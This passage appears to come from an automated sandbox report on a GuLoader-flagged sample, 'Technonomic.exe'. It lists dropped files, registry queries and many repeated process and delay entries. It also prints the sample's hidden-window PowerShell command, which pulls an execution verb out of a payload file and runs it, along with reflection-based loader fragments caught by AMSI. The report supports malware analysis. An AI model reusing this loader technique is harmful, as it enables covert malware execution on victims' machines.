Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe

File written: C:\Windows\Resources\unthick.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Technonomic.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000007.00000002.2598654434.000000000651E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Erni $Femhundredkroneseddels $Engangsdebitor), (Utmmelige226 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fnokurterne = [AppDomain]::CurrentDomain.GetAs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Armadaers)), $Litzirandvseners49).DefineDynamicModule($Ophugningernes, $false).DefineType($Knsbestem130, $Kapitals125, [System.Multica

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Technonomic.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "
Source: C:\Users\user\Desktop\Technonomic.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_045424B1 push ecx; retf	7_2_045424B2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_0454050B push ebx; ret	7_2_04540519
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_04540DC3 push ebp; retf	7_2_04540DDE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_04540B69 pushad ; ret	7_2_04540B77
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_04540BBE push eax; iretd	7_2_04540BCD

Source: C:\Users\user\Desktop\Technonomic.exe	File created: C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Technonomic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599751	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598711	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598280	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598172	Jump to behavior
